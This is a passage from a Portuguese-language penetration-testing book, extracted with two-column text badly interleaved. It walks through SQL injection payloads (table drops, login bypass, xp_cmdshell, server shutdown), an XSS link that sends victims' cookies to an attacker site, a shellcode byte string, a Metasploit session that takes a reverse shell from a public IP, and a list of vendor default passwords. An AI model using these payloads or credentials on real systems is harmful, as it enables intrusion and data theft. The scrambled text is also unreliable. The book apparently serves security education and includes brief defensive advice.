configurar muito bem um firewall empresarial (filtro de Injection e Cross Site Scripting (XSS). 170
pacotes), 11.1 Explorando Injection Nome: mar'cos
preferencialmente barrando as principais portas Vimos antes porque acontecem as falhas que permitem a Sobrenome: flavio
conhecidas de trojans injeo de O resultado pedido seria esse:
e backdoors. SQL. Mas o que exatamente teramos que digitar ou select id, nome, sobrenome from clientes where nome =
Configurar na malha fina o sistema de IDS para executar para que 'mar'cos' and sobrenome
detectar possveis consegussemos nos aproveitar desse problema? A idia = 'flavio'
presenas de backdoors, trojans ou keyloggers em colocar comandos Quando o banco de dados tentar rodar esse pedido,
atividade na rede. do banco de dados, de simples operadores lgicos a mostrar o erro a
Consultar sempre um Netstat grfico como o Active funes complexas, seguir:
Ports, que mapeie tudo regado com aspas simples para dar o toque final. Server: Msg 170, Level 15, State 1, Line 1
as conexes para os softwares, mostrando assim qual Parece complicado, Line 1: Incorrect syntax near 'cos'.
programa abriu mas no . A razo para isso que a insero do caractere de
qual porta. 11.1.1 Introduo aspas simples (')
Nos casos dos rootkits para o sistema Unix/Linux, Como falamos anteriormente, o SQL Injection ocorre quebrou a string, tomando parte dela como comando. O
experimente passar quando um atacante banco de
a excelente ferramenta Chkrootkit, criada por Nelson capaz de inserir comandos do banco de dados como dados tentou executar cos e falhou. Mas o que
Murilo. A pgina entrada de dados e aconteceria se o
para download <www.chkrootkit.org>. Observe o estes, quando no so filtrados corretamente, permitem atacante tentasse uma entrada como a seguinte?
software rodando, completa Nome: mar'; drop table clientes--
procurando por rootkits no sistema: manipulao das informaes. Sobrenome:
169 A seguir, vemos uma tpica linha de comando de SQL: A tabela clientes iria ser deletada por causa do comando
11 Explorando Falhas select id, nome, sobrenome from clients drop table.
Vamos entrar agora no segundo ramo do nosso Esse pedido ir nos fornecer as colunas id, nome e Poderamos tentar isso com outra tabela tambm, de
organograma que est sobrenome da tabela modo diferente, mas
no incio do Penetration Test. Suponhamos que clientes, retornando todas as linhas da tabela. O agora em uma entrada que pea nome de usurio e
descobrimos uma falha no resultado poderia ser senha:
nosso alvo atravs da pesquisa manual ou dos scanners restringido a um cliente especfico, como no prximo Usuario: '; drop table users--
de vulnerabilidade. exemplo: Senha:
J aprendemos os tipos de bugs e como identific-los. select id, nome, sobrenome from clientes where nome = A tabela users tambm ser deletada, negando acesso
Neste captulo, 'marcos' and aplicao para
vamos aprender tambm como explorar os diversos tipos sobrenome = 'flavio' todos os usurios. O caractere '--' o comentrio de linha
de problema. O simples usado
no SQL e o caractere ';' indica o fim de uma requisio e Vamos supor que o nosso atacante queira inserir uma Que produzir o erro:
o incio de outra. conta de Microsoft OLE DB Provider for ODBC Drivers error
O '--' no fim do campo de nome de usurio requerido usurio para si mesmo. Sem saber a estrutura da tabela '80040e14'
para que o nosso users, [Microsoft][ODBC SQL Server Driver][SQL Server]Column
pedido seja processado sem erro. dificilmente ele teria sucesso. Mesmo se ele tivesse sorte, o 'users.usuario' is
O invasor poderia se logar como qualquer um, caso significado do invalid in the select list because it is not contained in either
soubesse qual a campo privs no claro. O invasor poderia inserir 1 e an
conta do usurio, usando a seguinte entrada: conseguir para si aggregate function or the GROUP BY clause.
Usuario: mflavio'-- uma conta com privilgios limitados, mas o que ele est /process_login.asp, line 35
Ou poderia logar com o primeiro usurio da tabela users: atrs de uma Eventualmente, o invasor chega no seguinte usurio:
Usuario: ' or 1=1-- conta com acesso administrativo. ' group by users.id, users.usuario, users.senha, users.privs
Estranhamente, o invasor poderia tambm entrar como um Mas se mensagens de erro so retornadas da aplicao having
usurio (o 1=1--
completamente fictcio usando isso: comportamento padro do ASP), o atacante pode Que no produz erro e equivalente a:
171 determinar a estrutura select * from users where usuario = ''
Usuario: ' union select 1, 'fulano', 'qualquer_senha', 1 -- completa do banco de dados e ler qualquer valor que Ento, agora o atacante sabe que pedido feito somente
A razo do funcionamento disso que a aplicao possa ser lido pela pela tabela
acredita que a conta que a aplicao ASP est usando para se conectar users table e so usadas as colunas id, usuario, senha e
linha constante que o atacante especificou era parte das ao servidor privs, nessa exata
informaes SQL. ordem. Voc pode continuar utilizando essas tcnicas
extradas do banco de dados. Veremos alguns exemplos: para obter todo tipo
11.1.2 Obtendo Informaes de Mensagens de Erro 172 de informao que necessitar para depois realizar a
Neste tpico, vamos ver os mecanismos relacionados Primeiro, queremos descobrir os nomes das tabelas injeo diretamente.
tcnica das acessadas e tambm 173
mensagens de erro. Para manipular as informaes no os nomes dos campos. Para isso, s usar a clusula 11.1.3 Limites de Tamanho
banco de dados, having: s vezes, o tamanho dos dados de entrada restringido
o hacker ter que determinar a estrutura de certas Usuario: ' having 1=1-- para dificultar
tabelas. Por Isso provocar o seguinte erro: os ataques. Isso realmente restringe muitos os ataques,
exemplo, a nossa tabela users pode ter sido criada com o Microsoft OLE DB Provider for ODBC Drivers error mas ainda
seguinte '80040e14' possvel causar muitos danos. Por exemplo:
comando: [Microsoft][ODBC SQL Server Driver][SQL Server]Column Usuario: ';shutdown--
create table users( id int, 'users.id' is Isso ir desligar o servidor SQL, usando somente doze
usuario varchar(255), invalid in the select list because it is not contained in an caracteres.
senha varchar(255), aggregate drop table <nome da tabela>
privs int function and there is no GROUP BY clause. Outro problema: vamos supor que o nome de usurio foi
) /process_login.asp, line 35 limitado a 16
E inserimos os seguintes usurios: Agora sabemos o nome da tabela e da coluna na caracteres e a senha foi tambm limitada a 16
insert into users values( 0, 'admin', '101010', 0xffff ) resposta. Podemos caracteres; a combinao
insert into users values( 0, 'mflavio', '12345', 0x0000 ) continuar atravs das colunas introduzindo cada campo usurio/senha iria ento executar o comando shutdown,
insert into users values( 0, 'dribh', 'secreta', 0x00ff ) em uma clusula mostrado a
insert into users values( 0, 'zanoni', 'fckgw', 0x00ff ) group by, como mostrado a seguir: seguir:
Usuario: ' group by users.id having 1=1-- Usuario: aaaaaaaaaaaaaaa'
Senha: '; shutdown-- sobre o assunto. Creio que, com essa introduo que ...
A razo para isso que a aplicao tenta escapar das passei, j ser </HTML>
aspas simples possvel que voc entenda e teste corretamente as suas O navegador da vtima (Internet Explorer, por exemplo)
no fim do nome do usurio, mas a string arredondada entradas de dados, iria
para 16 visando um Penetration Test bem feito. interpretar essa resposta como uma pgina HTML
caracteres, apagando assim essas aspas. O resultado 11.2 Explorando XSS contendo um pequeno
que o campo de J vimos o que o Cross Site Scripting, agora vamos nos cdigo Java Script. Esse cdigo, quando executado,
senha pode conter SQL desde que comece com uma aspa atentar em permite acessar todos
simples, j que como os invasores usam essa tcnica para obter acesso os cookies pertencentes ao sistema, ento uma pequena
a requisio terminar assim: alheio. Geralmente, janela ser
select * from users where user='aaaaaaaaaaaaaaa'' and um link malicioso enviado para um usurio, que, ao mostrada no navegador com todas essas informaes.
password='''; clicar, roda Claro que um ataque real consistiria em enviar esses
shutdown-- automaticamente o script atravs do site vulnervel no seu cookies ao
O nome de usurio no pedido torna-se este: sistema. Isso atacante. Para isso, o invasor pode colocar no ar um site
aaaaaaaaaaaaaaa' and password=' no precisa ser necessariamente um link. Muitas vezes s Web
Assim, o nosso comando SQL rodar normalmente. de entrar em uma (www.invasor.com) e usar um script para receber as
11.1.4 Outras Strings pgina anteriormente planejada, o browser do usurio informaes. Ao invs
Mais algumas strings a serem testadas que resultam em j processar o de mostrar uma janela localmente, o hacker escreve um
interessantes javascript do XSS. Apesar de poder fazer diversos tipos cdigo que
tipos de resposta do servidor SQL quando a entrada de de interao, a acessa uma URL no seu site (nesse exemplo, o domnio
dados no bem tcnica mais comum fazer um cdigo Java Script para falso que
manipulada: capturar os cookies citamos), invocando a recepo dos cookies com um script
Autenticar sem fornecer credenciais: da pessoa que acessou o link. preparado para
Usurio: ' or ''=' http://www.vulneravel.com.br/welcome.cgi?name=<scrip essa tarefa.
Senha: ' or ''=' t>alert(docu O link malicioso seria:
174 ment.cookie)</script> http://www.vulneravel.com.br/welcome.cgi?name=<scrip
Autenticar como primeiro usurio da tabela users: A vtima, aps clicar no link, ir gerar uma requisio ao t>window.op
Usurio: ' or 1=1- site vulnervel, en(http://www.invasor.com/collec
Executar xp_cmdshell para listar diretrios: como mostrado a seguir: t.cgi?cookie=%2Bdocument.cookie)</script>
http://www.site.com.br/script.asp?0';EXEC+master..xp_ GET E a pgina de resposta ser:
cmdshell+'di /welcome.cgi?name=<script>alert(document.cookie)</s <HTML>
r';- cript> <Title>Bem Vindo!</Title>
Executar xp_servicecontrol para alterar servios do HTTP/1.0 Ol
sistema: Host: www.vulneravel.com.br <script>window.open(http://www.attacker.site/collect
http://www.site.com.br/script.asp?0';EXEC+master..xp_ ... .cgi?
servicecontr E a resposta do site vulnervel ser: cookie=+document.cookie)</script>
ol+'start',+ 'server';- <HTML> <BR>
Temos ainda diversas outras tcnicas relacionadas <Title>Bem Vindo!</Title> Bem vindo ao nosso sistema!
injeo de SQL. Ol <script>alert(document.cookie)</script> ...
um campo muito amplo, que pode ter diversos livros <BR> </HTML>
escritos somente 175 176
Bem vindo ao nosso sistema!
O navegador, imediatamente aps carregar essa pgina, extremamente til para obter acesso a um sistema alheio j prontos para serem utilizados (ou melhor, quase pronto
iria atravs de um - so
executar o Java Script embutido e enviar uma resposta exploit. Normalmente essas instrues so colocadas em distribudos apenas seu cdigo-fonte, compilar e executar
ao script um vetor de por sua
collect.cgi no site <www.invasor.com>, com os valores dos char, e jogadas na memria (ou em alguma varivel do conta; mostrarei como fazer isso daqui a pouco). Esses
cookies sistema, locais so
roubados do usurio que clicou no link. Isso compromete dependendo do caso) chamados de repositrios. Lembra-se que, quando
os cookies do Exemplo de shellcode: estvamos no
site vulnervel (www.vulneravel.com.br) que o cliente char captulo sobre como identificar possveis falhas, mostrei
possui. Pior, shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x um passo-apasso
permite ao invasor impressionar a vtima, conseguindo 68\x2f\x2f\x62 sobre como obter as informaes atravs do banco de
acesso a seus \x69\x89" dados do
servios sem nem precisar saber a sua senha. "\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0 securityfocus? Se prestar ateno, vai ver que no
11.3 Exploits \x0b\xcd\x80"; falamos nada sobre a
Um exploit um programa criado para testar uma falha 177 seo exploit do banco de dados que eles possuem. Isso
de segurana, Cada caractere uma instruo de mquina. \xcd\x80 porque eu
geralmente como prova de conceito, outras vezes feito int 80, por tratarei dessa seo agora. Siga todos os passos
com fins exemplo. Aps ocorrer um overflow do buffer, ns mostrados
maliciosos para realmente explorar e invadir sistemas necessitamos de um anteriormente, escolha a falha que quer mais informaes
alheios. Existem endereo de retorno. Se voc apontar para o cdigo de e entre na
tcnicas de explorao (exploiting) para diversos tipos de shell como seguinte seo:
falhas, como retorno (no caso de um stack overflow, por exemplo), as 178
os stack overflows, heap overflows e outros. Vamos ver instrues de Selecione os exploits que voc deseja e salve-os no seu
alguns desses mquina so lanadas e um shell mostrado. sistema.
tipos, como obter exploits, como eles funcionam, como Se voc controlar a string formatada de funes como Daqui a pouco, vou mostrar como execut-los. Caso voc
utiliz-los, printf, syslog ou no encontre
ferramentas para o desenvolvimento e utilizao etc. setproctitle, uma explorao tambm possvel. Strings na securityfocus o que deseja, no v ao Google e pegue
11.3.1 Payloads de formatao em qualquer
Um payload o cdigo que ser executado no so algo como: "%s", "%x", "%d". Por exemplo: site desconhecido. Muitas vezes, as pessoas no lem o
computador quando main(int argc, char **argv) que compilam e
houver o comprometimento de alguma falha. Esse { executam (especialmente os scripts kiddies) e existem
payload pode realizar char *buf = "TEST"; casos em que
diversas tarefas: adicionar um usurio no sistema, // Modo errado alguns sites deixam exploits disposio com cdigo
executar uma // O usurio pode controlar a string de formatao malicioso, que
determinada aplicao, etc. Mas normalmente, o payload printf(argv[1]); acaba instalando algum backdoor ou outro tipo de
mais comum // Voc deveria fazer assim: malware no seu
chamado de Shellcode printf("%x", argv[1]); sistema. Eu sugiro um outro site no qual tambm seguro
Shellcode so instrues de baixo nvel que ao ser } baixar essas
interpretadas pelo 11.3.2 Encontrando Exploits na Web ferramentas, o Packetstorm
software com bug, geram um shell do sistema. um Existem muitos locais na Internet nos quais fcil pegar (http://packetstormsecurity.org):
recurso exploits 179
11.3.3 Executando os Exploits
Geralmente eles vm em cdigo-fonte C ou Perl, ento ficam velhos rpido. Ensinar a pescar mais eficiente do para diferentes tipos de sistemas operacionais).
voc vai que dar os 11.3.4.1 Core Impact
necessitar desses compiladores para transformar esses peixes. Ento, mesmo que a falha do DCOM seja antiga Esse o primeiro software desenvolvido comercialmente
fontes em (de 2003), para um
executveis. Se voc tiver um sistema Linux/Unix, possuir o exemplifica bem como um exploit funciona. Penetration Test profundo, visando encontrar problemas
Cygwin Fornecemos o endereo IP para ser exploitado, o de segurana
instalado no seu sistema ou simplesmente utilizar a verso endereo de retorno em organizaes. Com ele, qualquer administrador de
do (que no caso era universal para o Windows XP) e o rede pode
compilador GCC para Windows, ainda mais simples. exploit nos forneceu facilmente realizar os passos de um invasor, inclusive com
Na grande maioria rapidamente um shell de sistema graas ao shellcode que a utilizao
dos casos, s fazer a compilao de modo padro, sem foi executado. de exploits, sem precisar mais ser um especialista ou
especificar Seja para exploits remotos ou locais de elevao de expert em
nenhuma opo extra. Por exemplo: privilgios, programao.
cc exploit.c o exploit que se aproveitem de estouros de buffers para rodar Explore vulnerabilidades na rede, descubra possveis
A opo (- o) vai gerar um executvel de nome exploit, shellcodes ou pontos de acesso,
que o simplesmente fazer recusa de servio (veremos sobre isso enfim, esse programa contm tudo o que um scanner de
programa em si. Basta rod-lo normalmente e especificar depois), o vulnerabilidades possui, a diferena justamente a
o que ele importante voc entender o bsico para realizar o questo dos
pede, como o endereo IP no qual ser testado (no caso PenTest: descubra a exploits. O Core Impact possui um recurso chamado de
de um exploit falha, procure o exploit correspondente, compile-o (se RPT (Rapid
para falha remota - em falhas locais, no necessrio, necessrio, leia o Penetration Test), que realiza desde o footprinting,
pois feita cdigo para instrues de como faz-lo) e utilize contra a varredura de hosts e
apenas a elevao de privilgios na maioria dos casos) e, mquina portas, enumerao, at a explorao de falhas
em alguns testada. Isso realmente d trabalho, mas existem algumas descobertas e, o
180 coisas que melhor, ainda gera um relatrio com todos os problemas
casos, o endereo de retorno da funo (alguns exploits podem facilitar a sua vida. encontrados
j oferecem um 11.3.4 Multiexploitadores por ele.
recurso de fora-bruta para descobrir essa informao ou 181 182
simplesmente Confirmando o benefcio dos exploits para a segurana Esses so os passos seguidos por ele:
usam endereos universais, se possvel). de uma 1. Obteno de informaes;
No exemplo a seguir, o exploit j foi compilado e rede, algumas empresas e grupos criaram ferramentas 2. Ataques e utilizao de exploits prprios;
executado. um visando o fcil 3. Obteno de informaes locais;
antigo exploit da falha de RPC DCOM do Windows desenvolvimento e utilizao desses poderosos recursos. 4. Escalao de privilgios;
2000/XP/2003. Algumas so 5. Limpeza de rastros;
Lembre-se do que eu citei no captulo sobre como pagas, outras gratuitas, mas todas com um mesmo 6. Gerao de relatrio.
identificar possveis objetivo: permitir uma excelente opo de ferramenta para Teste de
falhas no sistema: o importante voc aprender sobre explorao de sistemas para fins de teste utilizando Penetrao, mas
como identificar exploits de maneira infelizmente, pelo seu alto custo, no pode ser facilmente
falhas e utilizar exploits de modo genrico. De nada iria muito mais fcil que a tradicional, fornecendo recursos adquirida por
adiantar eu que tinham que qualquer um. A entra uma soluo um pouco mais tcnica,
escrever sobre diversos tipos de bugs e como explor-los, ser feitos mo todas as vezes (por exemplo, o cdigo mas de
j que estes de shellcode cdigo-fonte livre: o Metasploit.
11.3.4.2 MetaSploit imail_ldap IMail LDAP Service Buffer Overflow Available Targets:
O Metasploit Framework um projeto open source lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow Windows 2000 SP0/SP1
desenvolvido mercantec_softcart Mercantec SoftCart CGI overflow Available Options:
para diversos sistemas, como Linux, Windows e FreeBSD. msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3- Exploit: Name Default Description
um 026 -------- ------ ------- ---------------
ambiente completo para escrever, testar e utilizar cdigos mssql2000_resolution MSSQL 2000 Resolution Overflow optional SSL Use SSL
de exploits. poptop_negative_read Poptop Negative Read Overflow required RHOST target address
183 realserver_describe_linux RealServer Describe Buffer required RPORT 80 The target port
Ele nos fornece uma plataforma slida para Overflow Payload
desenvolvimento de samba_nttrans Samba Fragment Reassembly Overflow Information:
shellcode e pesquisa de vulnerabilidades. O Framework samba_trans2open Samba trans2open Overflow Space: 900
desenvolvido sambar6_search_results Sambar 6 Search Results Buffer Avoid: 13 characters
em Perl, C, Assembler e Python. Essa ferramenta possui Overflow Keys: noconn bind reverse
uma poderosa servu_mdtm_overflow Serv-U FTPD MDTM Overflow Nop
interface em modo texto e tambm uma interface Web. smb_sniffer SMB Password Capture Service Information:
Para demonstrar o funcionamento do metasploit, vamos solaris_sadmind_exec Solaris sadmind Command SaveRegs: esp
executar Execution ebp
um antigo exploit para Windows 2000 e, com ele, squid_ntlm_authenticate Squid NTLM Authenticate Keys:
tentaremos obter um Overflow Encoder Information:
shell. O comando a seguir mostra os exploits disponveis svnserve_date Subversion Date Svnserve Keys:
na ferramenta. ut2004_secure_linux Unreal Tournament 2004 secure Description:
Isso de grande ajuda para sabermos a sintaxe correta Overflow This exploits a buffer overflow in the request processor
depois. (Linux) of the Internet Printing Protocol ISAPI module in IIS. This
msf > show exploits ut2004_secure_win32 Unreal Tournament 2004 secure module works against Windows 2000 service pack 0 and
184 Overflow 1. If
Metasploit Framework Loaded Exploits (Win32) the service stops responding after a successful
Credits Metasploit Framework Credits afp_loginext warftpd_165_pass War-FTPD 1.65 PASS Overflow compromise,
AppleFileServer LoginExt PathName Buffer windows_ssl_pct Windows SSL PCT Overflow run the exploit a couple more times to completely kill the
Overflow msf > hung process.
apache_chunked_win32 Apache Win32 Chunked 185 References:
Encoding Se ns precisarmos de mais informaes sobre como usar http://www.microsoft.com/technet/security/bulletin/MS01
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer um -
Overflow determinado exploit (por exemplo, que parmetros so 023.mspx
distcc_exec DistCC Daemon Command Execution requeridos), http://www.osvdb.org/548
exchange2000_xexch50 Exchange 2000 MS03-46 Heap podemos usar o comando info. http://lists.insecure.org/lists/bugtraq/2001/May/0011.h
Overflow msf > info iis50_printer_overflow tml
frontpage_fp30reg_chunked Frontpage fp30reg.dll Name: IIS 5.0 Printer Buffer Overflow msf >
Chunked Encoding Target OS: win32 186
ia_webmail IA WebMail 3.x Buffer Overflow Privileged: No Exemplo de uma tela real visualizando um exploit:
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow Provided By: 11.3.4.3 Selecionando o Exploit no Metasploit
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow H D Moore <hdm [at] Assim que decidirmos usar um determinado exploit, utilize
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow metasploit.com> o comando use.
msf > use 188 thread, she
iis50_printer_overflow Assim que encontrarmos um servidor vulnervel, required LHOST Local address for connection
msf iis50_printer_overflow > precisaremos required LPORT 4321 Local port to receive connection
Como voc pode ver, nas informaes que pegamos (com especificar um payload. O que isso? Nada mais do Advanced Options:
o comando info), que os dados que vo Advanced (Msf::Payload::win32_reverse):
ns precisaremos de alguns parmetros como o endereo causar o overflow na memria, resultando (nesse caso) em Description:
IP e a porta TCP um shell se Connect back to attacker and spawn a shell
da mquina que iremos atacar. Faa isso com o comando conectando de volta mquina do atacante. Agora que decidimos pelo win32 reverse como paylod,
set. msf iis50_printer_overflow > show payloads vamos especific-lo
msf iis50_printer_overflow > set RHOST 192.168.0.1 Metasploit Framework Usable Payloads com o comando set payload.
RHOST -> 192.168.0.1 win32_bind Windows Bind Shell msf iis50_printer_overflow > set payload
msf iis50_printer_overflow > set RPORT 80 win32_bind_dllinject Windows Bind DLL Inject 189
RPORT -> 80 win32_bind_stg Windows Staged Bind Shell win32_reverse payload -> win32_reverse
Para ver se uma certa mquina vulnervel, podemos win32_bind_stg_upexec Windows Staged Bind 11.3.4.5 Configurando os Parmetros para o
sempre tentar o Upload/Execute Payload
comando check para realizar essa verificao: win32_bind_vncinject Windows Bind VNC Server DLL Os parmetros que precisamos passar para o payload
msf iis50_printer_overflow > check Inject so o endereo IP e a
[*] The system does not appear to be vulnerable win32_reverse Windows Reverse Shell porta necessria para que o shell reverso possa conectar.
msf iis50_printer_overflow > win32_reverse_dllinject Windows Reverse DLL Inject Voc se lembra
187 win32_reverse_stg Windows Staged Reverse Shell quando vimos conexo reversa? Voc vai especificar o
No est vulnervel. Vamos tentar outro sistema ento. win32_reverse_stg_ie Windows Reverse InlineEgg Stager seu endereo (ou
Novamente win32_reverse_stg_exec Windows Staged Reverse DNS dinmico) e porta.
utilizaremos o comando set para determinar o host e o Execute msf iis50_printer_overflow(win32_reverse) > set
check para win32_reverse_vncinject Windows Reverse VNC Server LHOST
determinar se falho. DLL 200.195.16.110
msf iis50_printer_overflow > set RHOST Vamos pegar informao sobre esse win32 reverse com o LHOST -> 200.195.16.110
200.131.250.100 comando info. msf iis50_printer_overflow(win32_reverse) > set LPORT
RHOST -> 200.131.250.100 msf iis50_printer_overflow > info win32_reverse 3500
msf iis50_printer_overflow > check Name: Windows Reverse Shell LPORT -> 3500
[*] The system appears to be vulnerable Version: $Revision: 1.23 Abra o Netcat mandando-o escutar na porta que voc
Para checar os parmetros atuais do exploit, utilize o $ OS/CPU: win32/x86 deseja receber o
comando show: Needs Admin: No shell. Pode ser qualquer uma. Nesse caso, voc s precisa
msf iis50_printer_overflow > show options Multistage: No abrir uma cpia
Exploit Options Total Size: 357 do Netcat, no necessrio abrir as duas. Se tiver
Exploit: Name Default Description Keys: reverse dvidas quanto a esse
-------- ------ -------------- ------------------ Provided By: processo, leia novamente o captulo sobre como burlar o
optional SSL Use SSL H D Moore <hdm [at] firewall.
required RHOST 200.131.250.100 The target address metasploit.com> C:\>ncnt -L n -p 3500
required RPORT 80 The target port Available Options: 11.3.4.6 Finalmente - Exploitando com Metasploit
Target: Windows 2000 SP0/SP1 Options: Name Default Description Estando tudo certo, digite o comando exploit e pronto!
Tela de exemplo: -------- ------- ------------ ------------------- s aguardar.
11.3.4.4 Selecionando o Payload optional EXITFUNC seh Exit technique: process, msf iis50_printer_overflow(win32_reverse) > exploit
[*] Starting Reverse Handler. desenvolvida em ruby. muito simples de se usar e algumas solues que podem ser tomadas. Primeiramente,
[*] Trying Windows 2000 SP0/SP1 using return to esp at facilita bastante o aplique todas as
0x732c45f3... trabalho. solues pedidas no captulo sobre como identificar
[*] Exiting Reverse Handler. 191 falhas. Alm delas,
msf iis50_printer_overflow(win32_reverse) > Para encerrar, o Metasploit trouxe em sua verso 3 um algumas outras podem e devem ser feitas:
Veja, a seguir, a janela do Netcat que foi aberta excelente recurso 193
recebendo o shell: denominado de AUTOPWN. Ele permite que voc apenas Aplicar, aos sistemas de IDS, regras que identifiquem
C:\>ncnt -L n -p 3500 especifique um diferentes
Microsoft Windows 2000 [Version 5.00.2195] endereo IP e uma porta, e ele automaticamente testa de tipos de shellcode. Assim voc saber quando algum
Copyright 1985-2000 Microsoft Corp. modo inteligente exploit for
C:\WINNT\system32>dir todos os exploits que se encaixam no contesto do servio utilizado contra o seu sistema.
Volume in drive C has no label. Volume Serial Number is descoberto. Utilize ferramentas como o metasploit para testar suas
4A21- O processo simples, voc usa db_create para criar um aplicaes
05D6 banco no postgres, mais importantes que usem a Internet. No somente
190 db_nmap para achar os hosts, etc. Depois utilizar o servidores
Directory of C:\WINNT\system32 db_autopwn para Web, FTP e de bancos de dados. Teste tambm as
08/10/2005 10:32a <DIR> . testar o recurso. Novamente, uma novidade muito aplicaes que a
08/10/2005 10:32a <DIR> .. interessante. sua prpria empresa desenvolve. Descubra se possuem
08/29/2002 04:10p 301 $winnt$.inf BackTrack estouros
08/29/2002 04:13p 2,952 $WINNT$.PNF O Backtrack uma distro Linux (com live cd) voltada de buffers ou outro tipo de falhas.
C:\>ipconfig /all ipconfig /all exclusivamente Teste tambm SQL Injection contra os seus scripts.
Controller (Novell 2000 Compatible) para testes de Penetrao. J vem com diversos utilitrios Verifique se
Physical Address. . . . . . . . . : 00-C0-E0-D4-BB-3A DHCP para footprinting, esto falhos. Se estiverem, refaa esses programas
Enabled. . . . . . . . . . . : No fingerprinting, wireless hacking, sniffers, etc. Tambm j filtrando
IP Address. . . . . . . . . . . . : 200.131.250.100 vem com o adequadamente a entrada de caracteres como aspas
Subnet Mask . . . . . . . . . . . : 255.255.255.0 Metasploit pr configurado e com centenas de exploits de simples.
Default Gateway . . . . . . . . . : 200.131.250.5 diversos tipos, e Utilize um Honeypot. Falaremos mais sobre ele na seo
DNS Servers . . . . . . . . . . . : 200.131.250.1 esse nmero pode aumentar atravs de um script de de
C:\> atualizao segurana.
Prontinho! Shell obtido por conexo reversa. Espero que automtica. Vale a pena peg-lo para utilizar. 194
essa 192 12 M Configurao/Senhas
pequena explicao de utilizao do metasploit tenha 11.4 Softwares Outra vez entramos em outro ramo do nosso
sido til. uma 11.4.1 Windows organograma inicial.
poderosa ferramenta e voc pode demorar a conseguir Core Impact (www.coresecurity.com) Novamente vamos recapitular: em um, tentamos utilizar
dominar seus MetaSploit (www.metasploit.org) Engenharia Social
inmeros recursos. Mas no desista, vale realmente a 11.4.2 Linux e malwares para acessar o sistema; no outro, tentamos
pena. melhor do MetaSploit (www.metasploit.org) explorar as falhas
que utilizar os exploits separadamente. BackTrack (www.remote-exploit.org/backtrack.html) que havamos descoberto; agora, a ltima das opes
Inclusive, apesar de ter demonstrado a utilizao do 11.5 Soluo que nos leva a um
metasploit na Para evitar que falhas sejam exploradas no seu sistema, acesso no-autorizado simplesmente explorar a m
unha, ele possui uma interface grfica (GUI) baseada em existem configurao de um
web,
sistema. Por que o captulo possui tambm o nome frente, com todos os caracteres minsculos e todos como roteadores, sistemas operacionais e servios de
Senhas? Porque a maisculos etc.).Ento, rede. O problema
configurao malfeita mais bsica que existe so senhas essa uma prtica que deve ser evitada. que essas informaes so comumente divulgadas na
fracas e raramente Como devemos ento montar a nossa senha? Internet, ento, se
trocadas (especialmente se forem senhas padres, como 195 voc instala um recurso que vem com uma senha padro
veremos a seguir). Utilizando: para um usurio
O nosso objetivo aqui ento um s: mostrar como no Letras maisculas e minsculas; qualquer e esquece de mudar essa informao, qualquer
necessrio Nmeros; pessoa que
instalar cavalos de tria ou explorar falhas em um Caracteres estendidos como /*+-*&@#{; conseguir identificar o seu dispositivo (atravs dos
sistema que mal Tamanhos de no mnimo 10 caracteres. processos de varredura
configurado. S esse fator j suficiente para que ele Uma senha segura seria algo como: e enumerao) como um roteador Cisco, por exemplo,
seja invadido ou R7hU@Y*32! poder se conectar a
tenha seus dados roubados. Acontece que algumas pessoas tm dificuldade de ele e ter total acesso.
12.1 Introduo s Senhas lembrar senhas assim. Mas e as configuraes de firewall? - voc diz. Bom, se
12.1.1 Senhas Fceis Ento devemos pensar em um modo de a senha ficar fcil uma pessoa
Nunca devemos deixar uma conta de usurio ou algum de lembrar e no tem noo de que necessita mudar as senhas padres
outro servio difcil de se descobrir. Uma soluo interessante poderia de seus
que dependa de autenticao sem senha. Os invasores ser pequenas dispositivos, no creio que ela conseguir fazer uma
podem se aproveitar frases (sem ou com espao entre as palavras). Exemplo: configurao adequada
disso. Mas tambm no adianta colocar senhas fceis. NaoContoMinhaSenha do filtro de pacotes. O invasor ainda conseguir se
Vamos ver mais Ou conectar ao recurso e
frente neste captulo diversos mtodos que permitem VoteEmMim2006 196
descobrir Outra coisa: esteja sempre mudando a sua senha. Mesmo tentar entrar com as informaes padres. Para
rapidamente senhas muito simples. que o exemplificar o perigo,
Nunca utilizar senhas do tipo: administrador da empresa que voc trabalha no exija forneo, a seguir, uma lista atualizada de senhas padres
Data de nascimento Exemplo: 070275. que voc faa essa de diferentes
Nome de familiar ou amigo Exemplo: marcelo. mudana de tempos em tempos (o que j pode ser fabricantes. Pegue-as e teste para ver se ainda
Local em que trabalha Exemplo: correios. considerada uma mconfigurao funcionam nos seus
Nome de personagens/filmes Exemplo: matrix. do sistema, j que essencial essa mudana), mude pelo dispositivos.
Outros nomes conhecidos Exemplo: cruzeiro. menos a cada ms suas senhas. Assim, voc j vai possuir Lista de Senhas Padres
Algumas pessoas acham que, pelo fato de misturarem uma segurana Fabricante Modelo Verso do
essas senhas extra, pois, se algum estivesse tentando fazer bruteforce SO
fracas com um nmero, estaro mais seguras. Vamos (fora-bruta) Login Senha
pegar o exemplo da com a sua senha, a chance dessa pessoa obter sucesso 3com 3comCellPlex7000 - tech tech
senha marcelo. Ser que ficaria bem mais seguro se ser muito menor. 3com
colocssemos Existe ainda um problema mais grave em relao a isso Cable Management
marcelo1? O nvel de risco o mesmo, seja qual nmero com as senhas System SQL Database
for. Os programas padres. (DOSCIC DHCP)
de fora bruta hoje conseguem fazer pequenas 12.1.2 Senhas Padres Win2000 &
permutaes quando tentam Senhas padres geralmente so encontradas em MS
descobrir a senha (exemplo: tentar a senha ao contrrio, dispositivos de rede DOCSIS_APP 3com
com nmeros na 3Com CoreBuilder 6000 - debug tech
3Com CoreBuilder 7000 - tech tech Newbridge Congo/Amazon/Tigris All changed)
3Com HiPer ARC Card v4.1.x of versions (no password default)
HA netman netman Cabletron routers and
adm none Adaptec RAID Storage Manager Pro All Administrator switches
3com Home Connect - User Password adaptec * * blank blank
3Com Linkbuilder 3500 - administer administer Alcatel/Newbridge/Timestep VPN Gateway Cayman 3220-H DSL Router GatorSurf
3Com LinkSwitch and CellPlex - tech tech 15xx/45xx/7xxx 5.
3Com LinkSwitch and CellPlex - debug synnet Any root permit Any -
3Com NAC (Network Access Allied Telesyn All Routers Any Manager Friend 3600 12 bumhole sniffer
Card) Allied Tenysin R130 - Manager friend - 12 turd burgular
